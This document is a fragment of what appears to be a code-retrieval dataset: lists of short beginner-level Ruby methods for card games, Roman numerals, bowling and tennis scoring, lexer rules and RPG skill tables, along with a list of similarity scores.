"def roman_numeral year\n thou = year/1000\n thou_remain = year%1000\n five_hundreds = thou_remain/500\n hundreds = (thou_remain%500)/100\n fifties = ((thou_remain%500)%100)/50\n tens = (((thou_remain%500)%100)%50)/10\n fives = ((((thou_remain%500)%100)%50)%10)/5\n ones = (((((thou_remain%500)%100)%50)%10)%5)/1\n \n \n #this is just to clear the terminal screen so you only see the result.\n100.times do puts \"\" \n end\n \n #outputs the letters times the number returned.\n puts \"M\" * thou + \"D\" * five_hundreds + \"C\" * hundreds + \"L\" * fifties + \"X\" * tens + \"V\" * fives + \"I\" * ones\nend",
"def preport\r\n\t\tputs \"#@name the #@type with #@health health has found an item and now has #@xp XP!\"\r\n\t\tputs \" \"\r\n\tend",
"def get_cr_or_level(num_of_pcs, cr_or_level)\n if num_of_pcs <= 4\n @cr = cr_or_level\n elsif num_of_pcs == 5\n @cr = cr_or_level + (cr_or_level * 0.25)\n elsif num_of_pcs == 6\n @cr = cr_or_level + (cr_or_level * 0.5)\n elsif num_of_pcs == 7\n @cr = cr_or_level + (cr_or_level * 0.75)\n elsif num_of_pcs == 8\n @cr = cr_or_level + cr_or_level\n end\n end",
"def scoreScissors m\n\t\t[1,0]\n\tend",
"def scoreRock m\n\t\t[0,0]\n\tend",
"def raindrops(number)\n output = \"\"\n if number % 3 != 0 && number % 5 !=0 && number % 7 != 0\n output = number\n end\n if number % 3 == 0\n output += 'Pling'\n end\n if number % 5 == 0\n output += 'Plang'\n end\n if number % 7 == 0\n output += 'Plong'\n end\n puts output\nend",
"def virality\n 0\n end",
"def base\n nombre = @nombre\n b = 1# nombre de diese\n nombre.times do |i|\n if i == 0\n next\n end\n espace = \" \"\n has = \"# \"\n \n c = nombre - i# nombre d'espace\n a = nombre - c\n puts \" #{espace*=c} #{has=has*b}\"\n b = (i + 2 + a)-1# nombre de diese\n end\n\nend",
"def pos_to_slot()\n {1 => 19, 2 => 25, 3 => 31, 4 => 87, 5 => 93, 6 => 99, 7 => 155, 8 => 161, 9 => 167}\nend",
"def calculate_score(hand_of_cards)\n card_values = hand_of_cards.map{|card_value| card_value[1]}\n total = 0 \n card_values.each do |card_value| \n if card_value == \"ACE\"\n total+= 11\n elsif card_value.to_i == 0 #For suits ie Jester, Queen\n total+= 10\n else \n total+= card_value.to_i\n end\n end \n\n#adjust for Aces\n card_values.select{|card| card == \"ACE\"}.count.times do \n total-=10 if total > 21\n end \n total\nend",
"def score\n if strike?\n pins + next_two_rolls rescue nil\n elsif spare?\n pins + next_roll rescue nil\n else\n pins\n end\n end",
"def weight\n 2 # ounces\n end",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 46 )\n\n \n # - - - - main rule block - - - -\n # at line 392:10: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 46 )\n\n end",
"def comp_choose_rps\n\trand_num = rand(3) \n\tif rand_num == 1 \n\t \"rock\"\n\telsif rand_num == 2 \n\t \"paper\"\n\telse \n\t \"scissors\"\n\tend\nend",
"def bicipital\n\t\t(@bicipital[0] + @bicipital[1] + @bicipital[2])/3\n\tend",
"def forty_two\n self[41]\n end",
"def tiredness (hours)\n if hours == 'ok'\n @rested += 1\n elsif hours == 'bad'\n @rested -= 1\n elsif hours == 'shit'\n @rested -= 5\n elsif hours == 'amazing'\n @rested += 5\n end\n end",
"def CP(level)\r\n cpNeeded = 0\r\n if level > 0 && level <= 5\r\n cpNeeded + 4\r\n elsif level > 5 && level <= 20\r\n cpNeeded + 8\r\n else\r\n cpNeeded + 0\r\n end\r\nend",
"def scorePaper m\n\t\t[0,0]\n\tend",
"def getNbRecompense\n return 0\n end",
"def determine_hand_value(hand)\n value_hand = hand.map do |x|\n if x.include?(\"Ace\")\n x = 11\n elsif [\"K\", \"Q\", \"J\", \"1\"].include?(x[0])\n x = 10\n else\n x = x[0].to_i\n end\n end\n value_hand = value_hand.inject(0) { |result, element| result + element }\n adjust_value_for_aces(hand, value_hand)\nend",
"def australian_postcodes_po_boxes\n nsw = (1000..1999).to_a\n act = (200..299).to_a\n vic = (8000..8999).to_a\n qld = (9000..9999).to_a\n sa = (5800..5999).to_a\n wa = (6800..6999).to_a\n tas = (7800..7999).to_a\n nt = (900..999).to_a\n \n # Convert integers to strings (postcodes are *not* integers)\n (nsw + act + vic + qld + sa + wa + tas + nt).map { |p| \"%04i\" % p }\nend",
"def convert_rt_priority_to_freshdesk (rt_priority)\n return 1 if rt_priority.to_i == 4\n return 2 if rt_priority.to_i == 3\n return 3 if rt_priority.to_i == 2\n return 4 if rt_priority.to_i == 1\nend",
"def print_case\n puts \" 1 2 3\" \n for n in 0..2 do #on commence à compter à 0\n print (65+n).chr + \" \" #affiche 65.chr correspond à A en ACSII donc ensuite en ajoutant n, on a B, C, \n @case_array[n][0].print_case\n print \" | \"\n @case_array[n][1].print_case\n print \" | \"\n @case_array[n][2].print_case \n puts\n end \n end",
"def name\n case @value\n when 0\n 'Joker'\n when 11\n \"Jack of #{@suit}\"\n when 12\n \"Queen of #{@suit}\"\n when 13\n \"King of #{@suit}\"\n when 14\n \"Ace of #{@suit}\"\n else\n \"#{@value.to_s} of #{@suit}\"\n\n end\n end",
"def kcalproteinas\n\t\t\t@proteinas * 4\n\t\tend",
"def value(hand)\n ace_count = 0\n hand_value = 0\n\n hand.each do |card|\n if card == :ace\n ace_count += 1\n hand_value += 11\n else\n hand_value += card\n end\n end\n\n # flip aces from being worth 11 to being worth 1 until we get <= 21\n # or we run out of aces\n while hand_value > 21 && ace_count > 0\n hand_value -= 10\n ace_count -= 1\n end\n\n hand_value\nend",
"def score\n return 'love' if love?\n return \"fifteen\" if fifteen?\n return \"thirty\" if thirty?\n return \"forty\" if forty?\n return \"deuce\" if deuce?\n return \"advantage\" if advantage?\n return \"win\" if win?\n end",
"def non_zero_digit; end",
"def huella_carbono\n if geidiario() < 800\n return 1\n end\n if geidiario() > 1200\n return 3\n else\n return 2\n end\n end",
"def criminal_skills(roll)\n case roll\n when 1..2\n if @@skills.include? \"Barter\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Barter\" # 1 pt max\n end\n when 3..9\n @@skills << \"Climbing\"\n when 10..13\n @@skills << \"Disguise Artist\"\n when 14..19\n @@skills << \"Dodge\"\n when 20..21\n @@skills << \"Driver\"\n when 22\n if @@skills.include? \"Erotic Arts\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Erotic Arts\" # max 1 skill pt in this area\n end\n when 23..25\n if @@skills.include? \"Forgery\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Forgery\"\n @@literacy = \"Literate\"\n end\n when 26..29\n @@skills << \"Gambler\"\n when 30..31\n @@skills << \"Grapple\"\n when 32\n @@skills << \"Gun Slinger\"\n when 33\n @@skills << \"Gunsmith\"\n when 34..37\n @@skills << \"Junk Crafter\"\n when 38..41\n @@skills << \"Knife Fighter\"\n when 42..47\n @@skills << \"Knife Thrower\"\n when 48..51\n @@skills << \"Lying\"\n when 52\n @@skills << \"Medic\"\n when 53..54\n if @@skills.include? \"Navigate by Stars\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Navigate by Stars\" # max 1 point in this skill\n end\n when 55\n @@skills << \"Negotiating\"\n when 56..66\n @@skills << \"Pick Locks\"\n when 67..77\n @@skills << \"Pick Pocket\"\n when 78\n @@skills << \"Pilot\"\n when 79\n @@skills << \"Relic Knowledge\"\n when 80..81\n @@skills << \"Riding\"\n when 82\n @@skills << \"Sniper\"\n when 83..88\n @@skills << \"Stealth\"\n when 89..91\n @@skills << \"Tracking\"\n when 92..94\n @@skills << \"Unarmed Combat\"\n when 95\n @@skills << \"Wilderness Survival\"\n when 96..100\n @@skills << \"Weapons Expert\"\n # if rolled more than once, take a second level in the same weapon or randomly roll a new weapon -- player's choice. Mutants and cyborgs can choose to apply the weapon expert skill to a mutation or implant, as desired.\n end\nend",
"def printCard(card_number)\n \n # get card rank\n rank = case card_number % 13\n when 0 then :King\n when 1 then :Ace\n when 11 then :Jack\n when 12 then :Queen\n else card_number % 13 \n end\n \n # get suit\n suit = case (card_number) % 4\n when 0 then :Heart\n when 1 then :Diamond\n when 2 then :Spade\n else :Club\n end\n\n return \"#{rank} of #{suit}\"\n \nend",
"def how_many_light_sabers_do_you_own(name = \"\")\n name == \"Zach\" ? 18 : 0\nend",
"def get_grade(n)\n puts n\n case n\n when 90..100\n p \"A\"\n when 80..89\n p \"B\"\n when 70..79\n p \"C\"\n when 60..69\n p \"D\"\n when 00..59\n p \"F\"\n else\n puts \"Please enter a number.\"\n end\n\nend",
"def assess_situation(number, announcement, excuse)\n if number == 99\n puts \"#{excuse}\"\n elsif number == 21\n puts \"#{announcement}\"\n else number == 3\n puts \"Meh. Hard Pass\"\n end\nend",
"def get_numerology (your_number)\r\n\tcase your_number\r\n\t\twhen 1\r\n\t\t\tputs \"You are a ONE! One is the leader. The number one indicates the ability to stand alone, and is a strong vibration. Ruled by the Sun.\"\r\n\t\twhen 2\r\n\t\t\tputs \"You are a TWO! This is the mediator and peace-lover. The number two indicates the desire for harmony. It is a gentle, considerate, and sensitive vibration. Ruled by the Moon.\"\r\n\t\twhen 3\r\n\t\t\tputs \"You are a THREE! Number Three is a sociable, friendly, and outgoing vibration. Kind, positive, and optimistic, Three’s enjoy life and have a good sense of humor. Ruled by Jupiter.\"\r\n\t\twhen 4\r\n\t\t\tputs \"You are a FOUR! This is the worker. Practical, with a love of detail, Fours are trustworthy, hard-working, and helpful. Ruled by Uranus.\"\r\n\t\twhen 5\r\n\t\t\tputs \"You are a FIVE! This is the freedom lover. The number five is an intellectual vibration. These are ‘idea’ people with a love of variety and the ability to adapt to most situations. Ruled by Mercury.\"\r\n\t\twhen 6 \r\n\t\t\tputs \"You are a SIX! This is the peace lover. The number six is a loving, stable, and harmonious vibration. Ruled by Venus.\"\r\n\t\twhen 7 \r\n\t\t\tputs \"You are a SEVEN! This is the deep thinker. The number seven is a spiritual vibration. These people are not very attached to material things, are introspective, and generally quiet. Ruled by Neptune.\"\r\n\t\twhen 8 \r\n\t\t\tputs \"You are an EIGHT! This is the manager. Number Eight is a strong, successful, and material vibration. Ruled by Saturn.\"\r\n\t\twhen 9\r\n\t\t\tputs \"You are a NINE! This is the teacher. Number Nine is a tolerant, somewhat impractical, and sympathetic vibration. Ruled by Mars.\"\r\n\t\telse \r\n\t\t\tputs \"Sorry, but your number doesn't exist.\"\r\n\tend\r\nend",
"def print_changing_numbers\n\t\ti = 1\n\t\t#zolang i kleiner is dan 11\n\t\twhile i < 11\n\t\t\t#print de string met het nummer variabele en verhoog het daarna met 1\n\t\t\tputs \"This sentence is number #{i}\"\n\t\t\ti = i+1\n\t\tend\n\tend",
"def cuantos_pares\n @pares = []\n @pares = @valores.to_h.select{|k, v| (2..2).cover?(v)}\n @pares.size\n end",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 37 )\n\n type = DIGIT\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 136:8: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 37 )\n\n end",
"def roman_numeral number\n\nend",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 53 )\n\n type = DIGIT\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 352:8: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 53 )\n\n end",
"def score\n result = 0\n tiro_index = 0\n rellenar_vector\n\n 10.times do\n if strike?(tiro_index)\n result += strike_Score(tiro_index)\n tiro_index += 1\n elsif spare?(tiro_index)\n\n result += spare_score(tiro_index)\n tiro_index += 2\n else\n result += cuadro_score(tiro_index)\n tiro_index += 2\n end\n end\n result\n end",
"def preferences\n [\n {fish: 15, leisure: 1},\n {fish: 15, leisure: 0},\n {fish: 14, leisure: 0},\n {fish: 13, leisure: 0},\n {fish: 12, leisure: 0},\n {fish: 11, leisure: 0},\n {fish: 10, leisure: 0},\n {fish: 9, leisure: 0},\n {fish: 8, leisure: 0},\n {fish: 7, leisure: 0},\n {fish: 6, leisure: 0},\n {fish: 5, leisure: 0},\n {fish: 4, leisure: 0},\n {fish: 3, leisure: 0},\n {fish: 2, leisure: 0},\n {fish: 1, leisure: 0},\n {fish: 0, leisure: 0}\n ]\n end",
"def ayarla(toplam)\n if toplam > 0\n return 1\n else\n return 0\n end\n end",
"def - rival\n case rival\n when Paper\n puts 'Paper tie (loser Paper)'\n when Scissors\n puts 'Scissors cut Paper (loser Paper)'\n when Lizard\n puts 'Lizard eats Paper (loser Paper)'\n else\n return rival - self\n end\n Paper\n end"
] | [
"0.61682594",
"0.5817779",
"0.5750655",
"0.56960154",
"0.5677398",
"0.5660142",
"0.56399095",
"0.5547494",
"0.5535588",
"0.5528255",
"0.5483012",
"0.54519147",
"0.5434948",
"0.54230285",
"0.541586",
"0.5403975",
"0.53857213",
"0.5367293",
"0.5358745",
"0.53388107",
"0.53162485",
"0.5312163",
"0.53116137",
"0.5307852",
"0.530172",
"0.5299927",
"0.5292735",
"0.52912796",
"0.52880275",
"0.5284393",
"0.52770674",
"0.52688825",
"0.52606964",
"0.52606964",
"0.5248154",
"0.5236471",
"0.5215105",
"0.5211385",
"0.5211154",
"0.52055776",
"0.5202333",
"0.52005565",
"0.51977277",
"0.5194523",
"0.51838505",
"0.5181531",
"0.5180617",
"0.5179706",
"0.517797",
"0.5174341",
"0.5173554",
"0.51732105",
"0.5170943",
"0.51664937",
"0.51612085",
"0.51576674",
"0.5157412",
"0.51526326",
"0.51481813",
"0.51473916",
"0.51444376",
"0.5142608",
"0.5142127",
"0.5136651",
"0.5128358",
"0.5119313",
"0.5116132",
"0.5113206",
"0.5112608",
"0.5111912",
"0.5111329",
"0.5106036",
"0.5102099",
"0.51016647",
"0.5100237",
"0.50976485",
"0.50923514",
"0.5091495",
"0.5090733",
"0.50890297",
"0.50867426",
"0.5084875",
"0.50846595",
"0.5083726",
"0.50794303",
"0.50786716",
"0.5077489",
"0.5075183",
"0.507076",
"0.5070744",
"0.5059963",
"0.5056383",
"0.5055364",
"0.5051853",
"0.504906",
"0.50470483",
"0.50453335",
"0.5044858",
"0.50443035",
"0.5036427",
"0.503423"
] | 0.0 | -1 |
Sign indices run 0 through 11: 0 is Aries, 11 is Pisces. | def zodiacComplements(sign)
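  # Returns the two neighboring signs: (sign+1)%12 is the next sign, (sign+11)%12 the previous.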
return [(sign+1)%12,(sign+11)%12]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def cardinal; end",
"def kcallipidos\n\t\t\t@lipidos * 9\n\t\tend",
"def rentas\n profesion ? 1 : 0\n end",
"def pontosStrike index\n\t\tif @rolls[index + 2]\n\t\t\tif @rolls[index + 2] == 10\n\t\t\t\tif @rolls[index + 4]\n\t\t\t\t\t10 + 10 + @rolls[index + 4]\n\t\t\t\telse\n\t\t\t\t\t10 + 10\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tif @rolls[index + 3]\n\t\t\t\t\t10 + @rolls[index + 2] + @rolls[index + 3]\n\t\t\t\telse\n\t\t\t\t\t10 + @rolls[index + 2]\n\t\t\t\tend\n\t\t\tend\t\n\t\telse \n\t\t\t10\n\t\tend\n\tend",
"def psh_bonuses(roll)\n case roll\n when 1..5\n @@skills << \"Brawling\"\n puts \"Brawling skill\"\n when 6..10\n @@skills << \"Stealth\"\n puts \"Stealth skill\"\n when 11..15\n @@skills << \"Weapons Expert\"\n puts \"Wpn expert!\"\n when 16..20\n @@skills << \"Dodge\"\n puts \"Dodge skill\"\n when 21..37\n @@endurance += 1\n @@strength += 1\n @@agility += 1\n @@accuracy += 1\n @@willpower += 1\n @@intelligence += 1\n @@perception += 1\n @@appearance += 1\n puts \"+1 to each attribute\"\n when 38..44\n @@endurance += (d(6) + d(6))\n puts \"+2d6 endurance\"\n when 45..51\n @@strength += (d(6) + d(6))\n puts \"+2d6 strength\"\n when 52..58\n @@agility += (d(6) + d(6))\n puts \"+2d6 agility\"\n when 59..65\n @@accuracy += (d(6) + d(6))\n puts \"+2d6 accuracy\"\n when 66..74\n @@intelligence += (d(6) + d(6) + d(6))\n puts \"+3d6 intelligence\"\n when 75..83\n @@willpower += (d(6) + d(6))\n puts \"+2d6 willpower\"\n when 84..90\n @@appearance += (d(6) + d(6) + d(6))\n puts \"+3d6 appearance\"\n when 91..97\n @@skills << \"Martial Arts\"\n puts \"Martial arts skill!\"\n when 98..99\n @@endurance += 2\n @@strength += 2\n @@agility += 2\n @@accuracy += 2\n @@willpower += 2\n @@intelligence += 2\n @@perception += 2\n @@appearance += 2\n puts \"+2 to each attribute\"\n when 100\n @@endurance += d(6)\n @@strength += d(6)\n @@agility += d(6)\n @@accuracy += d(6)\n @@willpower += d(6)\n @@intelligence += d(6)\n @@perception += d(6)\n @@appearance += d(6)\n puts \"JACKPOT -- +d6 to EACH Attribute!\"\n end\n\n end",
"def imc\n\t\tnum = (@peso/(@talla*@talla)).round(2)\n\t\tif num < 18.5\n\t\t\tnum #- Bajo peso\"\n\t\telsif num > 18.5 and num < 24.9\n\t\t\tnum #- Adecuado\"\n\t\telsif num > 25.0 and num < 29.9\n\t\t\tnum #- Sobrepeso\"\n\t\telsif num > 30.0 and num < 34.9\n\t\t\tnum #Obesidad grado 1\"\n\t\telsif num > 35.0 and num < 39.9\n\t\t\tnum #- Obesidad grado 2\"\n\t\telsif num > 40\n\t\t\tnum #- Obesidad grado 2\"\n\t\tend\t\t\t\n\tend",
"def pontosSpare index\n\t\tif @rolls[index + 1]\n\t\t\t10 + @rolls[index + 1]\n\t\telse\n\t\t\t10\n\t\tend\n\tend",
"def scorePaper m\n\t\t[0,1]\n\tend",
"def scorePaper m\n\t\t[1,0] \n\tend",
"def ordinal; end",
"def smart_aces hand\n# Adjusts the value of \"Ace\" elements to be either 1 or 11 depending on the hand total\n\thand_total = hand.reduce :+\n\tif hand_total < 12 && hand_total > 2\n\t\thand.map! do |card|\n\t\t\tif card == 1\n\t\t\t\t11\n\t\t\telse\n\t\t\t\tcard\n\t\t\tend\n\t\tend\n\telsif hand_total > 21\n\t\thand.map! do |card|\n\t\t\tif card == 11\n\t\t\t\t1\n\t\t\telse\n\t\t\t\tcard\n\t\t\tend\n\t\tend\n\telsif hand_total == 2\n\t\thand[0] = 11\n\tend\n\nend",
"def scoreRock m\n\t\t[0,1] \n\tend",
"def total\n total = 0\n aces = 0\n @hand.each do |card|\n case card[0]\n when 2..10 then total += card[0]\n when 'A' then aces += 1\n else total += 10\n end\n end\n total += add_aces(total, aces)\n total\n end",
"def raindrops num\n output = \"\"\n output << \"Pling\" if num % 3 == 0\n output << \"Plang\" if num % 5 == 0\n output << \"Plong\" if num % 7 == 0\n output.empty? ? num.to_s : output\nend",
"def vypis_reseni\n\n vystup = \"(\"\n @reseni.each do |prvek|\n if(prvek)then\n vystup += \"1\"\n else\n vystup += \"0\"\n end \n end\n vystup += \")\"\n \n return vystup\n end",
"def natural_bonus\n 0\n end",
"def values\n return [1,11] if ace?\n return [10] if face_card?\n [@identifier]\n end",
"def numbers\n @board.map!.with_index do |e, i|\n e == AIR ? i.to_s : e\n end\n draw_board\nend",
"def scoreRock m\n\t\t[1,0]\n\tend",
"def value(hand)\n # Sorting hack to get aces at the very end so we count them last\n hand.sort_by { |c| c.to_i != 0 ? c : c[0] - 81 }.reverse().inject(0) do |total,cur|\n if cur.to_i != 0\n total + cur # 2-10 case\n elsif [\"J\",\"Q\",\"K\"].include? cur\n total + 10 # J,Q, or K\n elsif cur == \"A\"\n if (total+11) > 21\n total + 1 # Count ace as 1\n else\n total+11 # Count ace as 11\n end\n end\n end\n end",
"def raindrops(number)\n raindrops_str = ''\n\n raindrops_str += 'Pling' if number % 3 == 0\n raindrops_str += 'Plang' if number % 5 == 0\n raindrops_str += 'Plong' if number % 7 == 0\n\n if raindrops_str == ''\n raindrops_str = number.to_s\n end\n\n raindrops_str\nend",
"def dices\n\t\t@rollAgain = 0\n\t\t@goalParam = 0\n\tend",
"def primordial; end",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3 \n end",
"def succ\n if (@type == \"t\" && @number == 4) || (@type != \"t\" && @number == 9)\n number = 1\n elsif @type == \"t\" && @number == 7\n number = 5\n else\n number = @number + 1\n end\n return Pai.new(@type, number)\n end",
"def charge(age)\n case age\n when (0..6)\n 0\n when (7..12)\n 300\n when (13..18)\n 600\n else\n 1000\n end\nend",
"def set\n\t$one = \"1\"\n\t$two = \"2\"\n\t$three = \"3\"\n\t$four = \"4\"\n\t$five = \"5\"\n\t$six = \"6\"\n\t$seven = \"7\"\n\t$eight = \"8\"\n\t$nine = \"9\"\n\t$turn = 0\t\t\nend",
"def fo_tool\n return actor.equips[0] if actor.primary_use == 1\n return actor.equips[1] if actor.primary_use == 2\n return actor.assigned_item if actor.primary_use == 3\n return actor.assigned_item2 if actor.primary_use == 4\n return actor.assigned_item3 if actor.primary_use == 5\n return actor.assigned_item4 if actor.primary_use == 6\n return actor.assigned_skill if actor.primary_use == 7\n return actor.assigned_skill2 if actor.primary_use == 8\n return actor.assigned_skill3 if actor.primary_use == 9\n return actor.assigned_skill4 if actor.primary_use == 10\n end",
"def score\n\t\tpontos = 0\n\t\tindex = 0\n\t\twhile (index < 20 && @rolls[index]) do\n\t\t\tif strike? index\n\t\t\t\tpontos += pontosStrike (index)\n\t\t\telsif spare? index\n\t\t\t\tpontos += pontosSpare (index)\n\t\t\telsif @rolls[index + 1]\n\t\t\t\tpontos += @rolls[index] + @rolls[index + 1]\n\t\t\telse\n\t\t\t\tpontos += @rolls[index]\n\t\t\tend\n\t\t\tindex += 2\n\t\tend\n\t\tpontos\n\tend",
"def card_scores\n card_scores = {\n \"JOKER\" => 13, \"J♠\" => 12, \"J♣\" => 11, \"A♠\" => 10, \"K♠\" => 9, \"Q♠\" => 8,\n \"10♠\" => 7, \"9♠\" => 6, \"8♠\" => 5, \"7♠\" => 4, \"6♠\" => 3, \"5♠\" => 2\n }\n card_scores.default = 0\n\n card_scores\n end",
"def clasificar\n if @sal <= 1\n \"poca\" \n elsif @sal > 1 and @sal <= 2\n \"media\"\n elsif @sal > 2\n \"mucha\"\n end\n end",
"def Traductor nume\n\nnumero = {}\nnumero[0] = \"Cero\"\nnumero[1] = \"Uno\"\nnumero[2] = \"Dos\"\nnumero[3] = \"Tres\"\nnumero[4] = \"Cuatro\"\nnumero[5] = \"Cinco\"\nnumero[6] = \"Seis\"\nnumero[7] = \"Siete\"\nnumero[8] = \"Ocho\"\nnumero[9] = \"Nueve\"\nnumero[10] = \"Diez\"\n\n\n\nreturn numero[nume.to_i]\n\n\nend",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3\n end",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3\n end",
"def boatswain\n return self.swabbie unless self.swabbie.nil?\n highval = 0\n self.axe.each do |flotsam|\n counter = self.filibuster(flotsam)\n highval = ((highval <=> counter) == 1) ? highval : counter\n end\n \".#{highval + 1}\"\n end",
"def single_card_value(card)\n case card[1].strip\n when \"2\"..\"10\" then card[1].to_i\n when \"J\", \"Q\", \"K\" then 10\n when \"A\" then 11\n end\nend",
"def get_hand_value(hand)\n hand_values = hand.map { |card| card[0]} \n \n total = 0\n #check if there are any Aces\n hand_values.each do |value|\n if value == 'A'\n total += 11\n elsif value.to_i == 0 # this is for J, Q, K\n total += 10\n else\n total += value.to_i\n end\n end\n # To accomodate Aces, subtract 10 from the total per Ace if the total is >21\n hand_values.select{|value| value == \"A\"}.count.times do \n total -= 10 if total >21\n end\n total\nend",
"def score \n return 'love' if @points == 0 \n return 'fifteen' if @points == 1 \n return 'thirty' if @points == 2 \n return 'forty' if @points == 3\n end",
"def apportion\n 385.times do |n|\n state = find_highest_priority\n @seats[state] += 1\n\n seat_number = 51 + n\n puts \"Assigning Seat #{seat_number} to #{state}\"\n end\n\n puts \"Just missed the cut...\"\n state = find_highest_priority\n puts \"Seat 436 would be assigned to #{state}\"\n\n @seats.each do |state, seats|\n printf(\"%20s\\t%3d\\n\", state, seats)\n end\n end",
"def scoreScissors m\n\t\t[0,1] \n\tend",
"def score(card)\n case card\n when :ace then 11 # assigns value to each symbol, helps with scoring\n when :king then 10\n when :queen then 10\n when :jack then 10\n else card\n end\nend",
"def pcode4\n school.sierra_code\n end",
"def ace_check\n cards[index_of_11][:points] = 1 if index_of_11 && (total > 21)\n end",
"def get_hand_score\n score = 0\n \n # Add up score of non-aces\n values = hand.map{|card| card.value}\n values.each do |val|\n if Array(2..10).include?(val.to_i)\n score += val.to_i\n elsif [\"J\", \"Q\", \"K\"].include?(val)\n score += 10\n end\n end\n\n # deal with the aces\n values.count(\"A\").times do\n if score + 11 <= 21\n score += 11\n else\n score += 1\n end\n end\n\n return score\n end",
"def digit; end",
"def check4aces num\n \tnum.each do |x|\n\t\tif x == 11\n\t\t\t@pScore.delete(11)\n\t\t\t@pScore << 1\n\t\tend\n\tend\n end",
"def roman digit\n\n\trules = [ 'I', 'V', 'X', 'L', 'C', 'D', 'M']\n\tnum = digit[0]\n\tplace = digit[1]\n\n\nromannumeral = []\nif num == 5\n\tromannumeral.push rules[place+1].to_s\n\n\nelse if num > 5\n\tromannumeral.push rules[place+1].to_s\n\tnum = num - 5\n\tnum.times do\n\tromannumeral.push rules[place].to_s\n\tend\n\nelse if num < 5\n\tnum.times do\n\t\tputs 'num<5'\n\tromannumeral.push rules[place].to_s\n\tend\n\n\tend\n\tend\n\tend\n\nreturn romannumeral\nend",
"def goal\n 28\n end",
"def get_int_value (value_string, current_total)\n case value_string\n # reg exp for 2-10, better way to do this? \n when /[2-9]|[1][0]/ \n value = value_string.to_i \n # face cards\n when /[JQK]/\n value = 10\n # aces\n when \"A\"\n if current_total + 11 <= 21\n value = 11\n else\n value = 1\n end\n end\n value\nend",
"def rank_for_print\n rank_print = @rank\n case @rank\n when :A then rank_print = \"Ace\"\n when :K then rank_print = \"King\"\n when :Q then rank_print = \"Queen\"\n when :J then rank_print = \"Jack\"\n end\n rank_print\n end",
"def determine_shape_for(pc, ri)\n\t\tif pc == '1'\n\t\t\treturn '3' if ri == 'E3' or ri == 'E4' #Flat Rate Envelope\n\t\t\treturn '1' #Letters\n\t\telsif pc == '2'\n\t\t\treturn '3' if ri == 'E3' or ri == 'E4' or ri == 'FE' #Flat Rate Envelope\n\t\t\treturn 'I' if ri == 'E5' or ri == 'E6' or ri == 'E7' #Legal Flat Rate Envelope\n\t\t\treturn '9' if ri == 'FP' #Flat Rate Padded Envelope\n\t\t\treturn '2' #Flats\n\t\telsif pc == '3'\n\t\t\treturn 'J' if ri == 'C6'\n\t\t\treturn 'K' if ri == 'C7'\n\t\t\treturn 'L' if ri == 'C8'\n\t\t\treturn '8' if ri == 'E8' or ri == 'E9' or ri == 'EE' #Regular/Medium Flat Rate Box\n\t\t\treturn '5' #Parcels\n\t\telsif pc == '4'\n\t\t\treturn '5' #Parcels\n\t\telsif pc == '5'\n\t\t\treturn '9' if ri == 'FP' #Flat Rate Padded Envelope\n\t\t\treturn 'F' if ri == 'FS' #Small Flat Rate Box\n\t\t\treturn '8' if ri == 'FB' #Regular/Medium Flat Rate Box\n\t\t\treturn 'D' if ri == 'PL' #Large Flat Rate Box\n\t\t\treturn 'E' if ri == 'PM' #Large Flat Rate Military Box\n\t\t\treturn '5' #Parcels\n\t\telsif pc == 'O'\n\t\t\treturn '7' #PMOD/Pallets\n\t\telse\n\t\t\treturn '0' #Default/Fill\n\t\tend\n\tend",
"def get_grade int\n\tcase int\n\twhen 90...100\n\t\treturn \"A\"\n\twhen 80...89\n\t\treturn \"B\"\n\twhen 70...79\n\t\treturn \"C\"\n\twhen 60...69\n\t\treturn \"D\"\n\twhen 50...59\n\t\treturn \"F\"\n\telse \n\t\treturn \"F\"\n\tend\nend",
"def score\n score = 0\n aces_count = 0\n @hand_contents.each do |card|\n if card.type == :face\n score += 10\n elsif card.type == :ace\n aces_count += 1\n score += 11\n elsif card.type == :number\n score += card.rank.to_i\n end\n end\n\n while score > 21 && aces_count > 0\n score -= 10\n aces_count -= 1\n end\n score\n end",
"def get_energia_lipidos\n\t\t\t\t@lipidos * 9\n\t\t\tend",
"def handle_ace(hand,sum)\n\t\tputs \"inside handleace #{sum} and #{hand}\"\n\t\tif sum > 21 && hand.include?(21)\n\t\t\thand.each { |x| \n\t\t\t\tif x==\"A21\" \n\t\t\t\tx=\"A1\" \n\t\t\t\tend}\n\t\t\treturn hand\n\t\tend\n\tend",
"def which_hand(roll)\n case roll\n when 1..7 then result = \"Right\"\n when 8..9 then result = \"Left\"\n when 10 then result = \"Ambidextrous\"\n end\nend",
